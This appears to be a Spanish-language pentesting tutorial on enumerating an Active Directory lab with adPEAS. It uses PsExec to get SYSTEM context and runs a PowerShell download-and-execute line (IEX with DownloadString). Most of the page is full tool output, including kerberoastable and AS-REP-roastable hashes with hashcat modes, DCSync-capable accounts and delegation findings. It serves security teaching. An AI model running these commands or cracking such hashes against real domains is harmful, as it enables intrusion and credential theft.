Utilizando ADPeas
Introducción a ADPeas
Una herramienta muy interesante que arroja mucha informacion con una sola ejecuccion es ADPeas.ps1:
Saliendo del contexto de usuario local
PsExec es una herramienta ligada a la suite de Sysinternals de Microsoft y permite la ejecución de procesos en sistemas remotos. Es particularmente útil para administradores de sistemas, pero también es conocido por ser utilizado por atacantes o pentesters para moverse lateralmente a través de una red.
Contexto de Autenticación: Cuando interactúas con Directorio Activo (AD), lo haces a través de un contexto de autenticación, que esencialmente dicta qué derechos y permisos tiene el usuario o proceso actual. Si estás ejecutando comandos en una máquina comprometida con un contexto local (por ejemplo, una shell reversa que no tiene un token de autenticación para AD), es posible que no puedas consultar o interactuar con el AD aunque estés en un dominio.
Cambiar Contexto: Usando
PsExec, puedes ejecutar comandos o programas en el contexto de otro usuario, o incluso en el contexto de SYSTEM si tienes los permisos necesarios. Al hacerlo, estás esencialmente "cambiando" tu contexto de autenticación, lo que puede darte los derechos necesarios para interactuar con AD.
En resumen, aunque no es estrictamente necesario usar PsExec para salir del contexto de usuario local y enumerar AD (hay otras técnicas y herramientas que pueden lograr lo mismo), PsExec es una herramienta versátil que permite a los atacantes y pentesters cambiar de contexto de autenticación y moverse lateralmente a través de una red. Por lo tanto, es una herramienta útil en escenarios donde se necesita ampliar el alcance o cambiar el contexto para interactuar con AD.
Un usuario administrator local no puede interactuar con el dominio y por lo tanto es necesario salir del contexto y migrar a NT AUTHORITY SYSTEM. Estos pasos se realizaran desde una sesion de RDP:
PS C:\Users\Administrator> net group /domain
The request will be processed at a domain controller for domain infinity.com.
System error 5 has occurred.
Access is denied.Para salir del contexto, se utiliza PSExec:
Se recomienda la lectura de Introduccion a Sysinternals
PS C:\Users\Administrator\Desktop> .\PsExec64.exe -i -s cmd.exeDespues de esto saldra una nueva pestaña que si podra interactuar con el dominio:
Despues de lo anterior, tendremos permisos necesarios para interactuar con el dominio desde ADPeas.ps1:
PS C:\Windows\system32> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1')
PS C:\Windows\system32> Invoke-adPEAS
_ _____ ______ _____
| | __ \| ____| /\ / ____|
____ __| | |__) | |__ / \ | (___
/ _ |/ _ | ___/| __| / /\ \ \___ \
| (_| | (_| | | | |____ / ____ \ ____) |
\__,_|\__,_|_| |______/_/ \_\_____/
Version 0.8.13
Active Directory Enumeration
by @61106960
Legend
[?] Searching for juicy information
[!] Found a vulnerability which may can be exploited in some way
[+] Found some interesting information for further investigation
[*] Some kind of note
[#] Reserved
[?] +++++ Searching for Juicy Active Directory Information +++++
[?] +++++ Checking General Domain Information +++++
[+] Found general Active Directory domain information for domain 'spartancybersec.corp':
Domain Name: spartancybersec.corp
Domain SID: S-1-5-21-1861162130-2580302541-221646211
Domain Functional Level: Windows 2016
Forest Name: spartancybersec.corp
Forest Children: No Subdomain[s] available
Domain Controller: First-DC.spartancybersec.corp
[?] +++++ Checking Domain Policies +++++
[+] Found password policy of domain 'spartancybersec.corp':
Minimum Password Age: 1 days
Maximum Password Age: 42 days
[+] Minimum Password Length: 7 character
Password Complexity: Enabled
[!] Lockout Account: Disabled
Reversible Encryption: Disabled
[+] Found Kerberos policy of domain 'spartancybersec.corp':
Maximum Age of TGT: 10 hours
Maximum Age of TGS: 600 minutes
Maximum Clock Time Difference: 5 minutes
Krbtgt Password Last Set: 09/19/2022 23:34:18
[?] +++++ Checking Domain Controller, Sites and Subnets +++++
[+] Found domain controller of domain 'spartancybersec.corp':
DC Host Name: First-DC.spartancybersec.corp
DC Roles: SchemaRole,NamingRole,PdcRole,RidRole,InfrastructureRole
DC IP Address: 10.0.1.100
Site Name: Default-First-Site-Name
[?] +++++ Checking Forest and Domain Trusts +++++
[+] Found configured domain trusts of 'spartancybersec.corp':
Target Domain Name: vikingscybersec.corp
Target Domain SID: S-1-5-21-3191546187-884582097-4033286759
Flags: DIRECT_OUTBOUND, DIRECT_INBOUND
TrustAttributes: FILTER_SIDS
[?] +++++ Checking Juicy Permissions +++++
[?] +++++ Checking Add-Computer Permissions +++++
[+] Filtering found identities that can add a computer object to domain '':
[!] Every member of group 'Authenticated Users' can add a computer to domain ''
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=spartancybersec,DC=corp
objectSid: S-1-5-11
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=spartancybersec,DC=corp
CN=Users,CN=Builtin,DC=spartancybersec,DC=corp
[?] +++++ Checking DCSync Permissions +++++
[+] Filtering found identities that can perform DCSync in domain '':
[+] The identity 'admin' is a non-default account and can DCSync a domain controller
sAMAccountName: admin
distinguishedName: CN=admin,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1008
memberOf: CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Administrators,CN=Builtin,DC=spartancybersec,DC=corp
[*] accountexpires: This identity has been expired since 01/01/1601 00:00:00
pwdLastSet: 09/29/2023 02:12:11
lastLogonTimestamp: 09/29/2023 02:03:37
userAccountControl: NORMAL_ACCOUNT
[+] admincount: This identity is or was member of a high privileged admin group
[?] +++++ Checking LAPS Permissions +++++
[?] +++++ Searching for GPO local group membership Information +++++
[?] +++++ Searching for Active Directory Certificate Services Information +++++
WARNING: [Get-adPEASCA] Error retrieving ADCS information: Exception calling "FindAll" with "0" argument(s): "There is no such object on the server.
"
[?] +++++ Searching for Vulnerable Certificate Templates +++++
[?] +++++ Searching for Credentials Exposure +++++
[?] +++++ Searching for ASREProastable User +++++
[!] Found ASREProastable User 'asrep.user':
sAMAccountName: asrep.user
distinguishedName: CN=asrep.user,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1128
pwdLastSet: 09/29/2023 02:03:36
lastLogonTimestamp: 09/29/2023 02:03:36
[+] userAccountControl: NORMAL_ACCOUNT, DONT_REQ_PREAUTH
Hashcat usage: Hashcat -m 18200
$krb5asrep$23$asrep.user@spartancybersec.corp:8995909962b0fd21a925ca8bfbf9c894$61322316eedd52d638ad1dabb7b011559f0dffb36de32b252d24291eb6a9fbe1a237acc2143a8e6f70bb65c3075caf28d22b92b491a87a8bc48d28233c1abc56b07239533fa9571c7c89e599e53a7551b03d8c702cf3759c19f75ea0f24c5cedd669fd57b6422c4b73ea95161b754f408306c479d7844c0a6bc2a9a15249b42ad8acf83f5afcd4d9b892835150a9bd49d377c6d548f9405139492a8bcf7ea740a31b986604cf05f1eb5f16c2d1cb826fd05417ab1550b3d2ce9ae2fce985b6349f62f788418a44c0e058107c4d5433dba37b0038c5b3f61b11bc0e671c2b77e6522cafca0cde6b8730a4808e803de91a78c34adb774100fa1761512e
[?] +++++ Searching for Kerberoastable User +++++
[!] Found Kerberoastable User 'roast.user':
sAMAccountName: roast.user
distinguishedName: CN=roast.user,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1127
pwdLastSet: 09/29/2023 02:03:36
lastLogonTimestamp: 09/29/2023 02:03:36
userAccountControl: NORMAL_ACCOUNT
Hashcat usage: hashcat -m 13100
$krb5tgs$23$*roast.user$spartancybersec.corp$MSSQL/sql.spartancybersec.corp*$A8DDCBEA1C6AEFE971C4BA672CBC9F32$8D3C7A07D449581969F4AB91BCDBA8FB06FFC89DB32DBF7E1A749CC4ED6B75F94081A66AC6800DF451243CCFFC99ECF84B329247D3C8ABF0E8B81684171DC99E1D1261BED8BEBB55FB094E1349FF0FC976C5F6DDA37F3BFF6263CCAA7A4A1466893493B92D5B45FD49D6793070134551E1CA418528F76521F4E76CA67FC27A36207507A5E6CC4F26211816F7455CFD3C9A32B1DE98C3F8C73CB70D25D8DDFC67084316856736B1D363177BA112F57096D188DB465A2A43B3FC3902D8BED0CC200A3273F8798FBA72A9585E6E2F728DEDE48CB678411064FDC0A58011A42B93301D4F98F47DD26E02DBECBF8FF7053472879C4105F66CACA699B62D6DFC70E91351AC5F8A778A622DACB54BF9B0E7D91D264A23D62014B2E5CB4088B5ED8F1F13C46F7CBA74D5BFB4207F3FE5FAB512CD3FE9E1A41AE02C710895F656CF8562B58F516E5B656162F22CBC9FA2E1FF5E58A8D19491D751D187AAC82810EEF259A8FB78373B37A192A8E8BB553D437E765B459A4AFB2F7BD6E0B4CC775244503407861063F697AA79212EB01CF96B81A8A18666F3E2EC108DC45C24EF8392F1144D7DBB797DFB0B5E078EB707573B1FCE19B7CF0196684899100E8716D6AAF790804D6F755832CB61666A982937193FF2681632448BD1BC670552458B6FF1ECD6FA7384CB1426BE5332CF363624D7E58E57EB6EAD8D5E637B5F4EB5FCF9660157C5A4D02BE879D341189067A771AED1ABB44C2FF194B21D64F50D6760B229FB8B654347AE9E22E3D41A93EAFD655B71C63BD25ECA4082F82719CAC5B3A22A085C994925C876054DADB4440A047E7A0E2290EB39D9FDE403285E25815EEB16AB9382C2039A97FE9A945B7C55B2191EE9BAF73A004916D2C36423A33CA219362B864793D5D6E4ED3B62FE9EB584DE00AEBE7FD83DEB19C8D78CD24F2F9915824E79A56EA87C0598DCD00AC8A38FFB28C8B3128845EFF57A52904D4E3E70E1F1D575E67B4CB93C4D467CBF4AB94280316C605795347C90B174C9B2B05F2B65E886538400A240C5ABC729CA0BC63A35675C1790A28C43EAC15EA322E29AF15CDE522BADA7A44F6D0CD7D73EA110E860C92CB839B27E6DF530F7D30C1C886150A4D51DAC872DF5210C81A9BD22092202E70C03EE542F3690B82781C18741FB747298A33C1226D671C5F1B00A7B5D1DD46C8C7184466EB83F5D38A1E1297436D9DD845704A489A38ABF11FFD996DF0A97D703A4D611DFEF66FFAAC80F5DA75FBA4A6D71416D193A15F1C195E8DAB0FD2EC8AB9EC0952657607965C8FE0B1C1AC66D8CB36804A497AFD146687BD3A337630ACF8707406E5B27C56665C5C6BB6CEECC6FBB95D3E472FA818BEE0F1A2466B8807E2D524746EF79B77A6E104FDA867BF23F80293BD7C64329663ED5F6FA02CF9658B4E2EFAC662502B3C21592BE2C4B1155AF70C07A87CB1143C2EDFE86FE75E70E21014E4E072EE49C1A1ACA6102F4FEE01FACBB2F4629988FA2B7CA4A91583604B81AE6FD06393C4A915362796ED4D780B1FEC6C7C510B43B4D68971FAEB491F84F48A48DCB680639BBA7551188102BF48DFE974D8A94B3F12A619526C2925A28B5E22653A03A6C97BA72478531FC76CD24E9AEAD779F07C6778D2212D77DF238DCBBB9E4234201D40824654CE64258DD8A6A82D5862DA71BE067FFADBE78282552EE5DDD0D33AADB0C6F06
[?] +++++ Searching for User with 'Linux/Unix Password' attribute +++++
[?] +++++ Searching for Computer with enabled and readable LAPS attribute +++++
[?] +++++ Searching for Group Managed Service Account (gMSA) +++++
[?] +++++ Searching for Credentials in SYSVOL Group Policy Files +++++
[?] +++++ Searching for Sensitive Information in NETLOGON Share +++++
[?] +++++ Searching for Delegation Issues +++++
[?] +++++ Searching for Computer with Unconstrained Delegation Rights +++++
[?] +++++ Searching for Computer with Constrained Delegation Rights +++++
[!] Found constrained delegation rights for Computer 'Suspicious-PC$':
sAMAccountName: Suspicious-PC$
distinguishedName: CN=Suspicious-PC,CN=Computers,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1116
[+] msDS-AllowedToDelegateTo: HTTP/First-DC.spartancybersec.corp/spartancybersec.corp
HTTP/First-DC.spartancybersec.corp
HTTP/First-DC
pwdLastSet: 09/19/2022 23:40:27
userAccountControl: WORKSTATION_TRUST_ACCOUNT
[!] Found constrained delegation rights for Computer 'USER-SERVER$':
sAMAccountName: USER-SERVER$
distinguishedName: CN=USER-SERVER,CN=Computers,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1129
operatingsystem: Windows Server 2019 Datacenter
[+] msDS-AllowedToDelegateTo: HOST/First-DC.spartancybersec.corp/spartancybersec.corp
HOST/First-DC.spartancybersec.corp
HOST/First-DC
pwdLastSet: 09/19/2022 23:43:39
[*] lastLogonTimestamp: 09/19/2022 23:43:39 (Computer is likely not online anymore!)
userAccountControl: WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION
[?] +++++ Searching for Computer with Resource-Based Constrained Delegation Rights +++++
[?] +++++ Searching for User with Constrained Delegation Rights +++++
[!] Found constrained delegation rights for User 'constrained.user':
sAMAccountName: constrained.user
distinguishedName: CN=constrained.user,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1115
[+] msDS-AllowedToDelegateTo: CIFS/First-DC.spartancybersec.corp/spartancybersec.corp
CIFS/First-DC.spartancybersec.corp
CIFS/First-DC
pwdLastSet: 09/29/2023 02:03:21
lastLogonTimestamp: 09/29/2023 02:03:21
userAccountControl: NORMAL_ACCOUNT
[?] +++++ Searching for User with Resource-Based Constrained Delegation Rights +++++
[?] +++++ Starting Account Enumeration +++++
[?] +++++ Searching for Azure AD Connect +++++
[?] +++++ Searching for Users in High Privileged Groups +++++
[+] Found members in group 'BUILTIN\Administrators':
GroupName: Domain Admins
distinguishedName: CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-512
[+] description: Designated administrators of the domain
GroupName: Enterprise Admins
distinguishedName: CN=Enterprise Admins,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-519
[+] description: Designated administrators of the enterprise
sAMAccountName: admin
distinguishedName: CN=admin,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1008
memberOf: CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Administrators,CN=Builtin,DC=spartancybersec,DC=corp
[*] accountexpires: This identity has been expired since 01/01/1601 00:00:00
pwdLastSet: 09/29/2023 02:12:11
lastLogonTimestamp: 09/29/2023 02:03:37
userAccountControl: NORMAL_ACCOUNT
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=spartancybersec,DC=corp
CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Enterprise Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Schema Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Administrators,CN=Builtin,DC=spartancybersec,DC=corp
[+] description: Built-in account for administering the computer/domain
[*] accountexpires: This identity has been expired since 01/01/1601 00:00:00
pwdLastSet: 09/19/2022 23:22:58
userAccountControl: NORMAL_ACCOUNT
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SPARTANCYBERSEC\Domain Admins':
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=spartancybersec,DC=corp
CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Enterprise Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Schema Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Administrators,CN=Builtin,DC=spartancybersec,DC=corp
[+] description: Built-in account for administering the computer/domain
[*] accountexpires: This identity has been expired since 01/01/1601 00:00:00
pwdLastSet: 09/19/2022 23:22:58
userAccountControl: NORMAL_ACCOUNT
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: admin
distinguishedName: CN=admin,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1008
memberOf: CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Administrators,CN=Builtin,DC=spartancybersec,DC=corp
[*] accountexpires: This identity has been expired since 01/01/1601 00:00:00
pwdLastSet: 09/29/2023 02:12:11
lastLogonTimestamp: 09/29/2023 02:03:37
userAccountControl: NORMAL_ACCOUNT
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SPARTANCYBERSEC\Enterprise Admins':
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=spartancybersec,DC=corp
CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Enterprise Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Schema Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Administrators,CN=Builtin,DC=spartancybersec,DC=corp
[+] description: Built-in account for administering the computer/domain
[*] accountexpires: This identity has been expired since 01/01/1601 00:00:00
pwdLastSet: 09/19/2022 23:22:58
userAccountControl: NORMAL_ACCOUNT
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SPARTANCYBERSEC\Group Policy Creator Owners':
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=spartancybersec,DC=corp
CN=Domain Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Enterprise Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Schema Admins,CN=Users,DC=spartancybersec,DC=corp
CN=Administrators,CN=Builtin,DC=spartancybersec,DC=corp
[+] description: Built-in account for administering the computer/domain
[*] accountexpires: This identity has been expired since 01/01/1601 00:00:00
pwdLastSet: 09/19/2022 23:22:58
userAccountControl: NORMAL_ACCOUNT
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SPARTANCYBERSEC\DnsAdmins':
sAMAccountName: dnsadmin.user
distinguishedName: CN=dnsadmin.user,CN=Users,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1113
memberOf: CN=DnsAdmins,CN=Users,DC=spartancybersec,DC=corp
pwdLastSet: 09/29/2023 02:03:19
lastLogonTimestamp: 09/29/2023 02:03:19
userAccountControl: NORMAL_ACCOUNT
[?] +++++ Searching for High Privileged Users with a password older 5 years +++++
[?] +++++ Searching for High Privileged User which may not require a Password +++++
[?] +++++ Starting Computer Enumeration +++++
[?] +++++ Searching for Domain Controllers +++++
[+] Found Domain Controller 'FIRST-DC$':
sAMAccountName: FIRST-DC$
distinguishedName: CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp
objectSid: S-1-5-21-1861162130-2580302541-221646211-1009
operatingsystem: Windows Server 2019 Datacenter
pwdLastSet: 09/29/2023 02:00:31
lastLogonTimestamp: 09/29/2023 02:00:40
[+] userAccountControl: SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATIONGracias al resultado previo sabemos que hay un usuario vulnerable a kerberoasting.
Te recomendamos revisar el siguiente video:
Última actualización
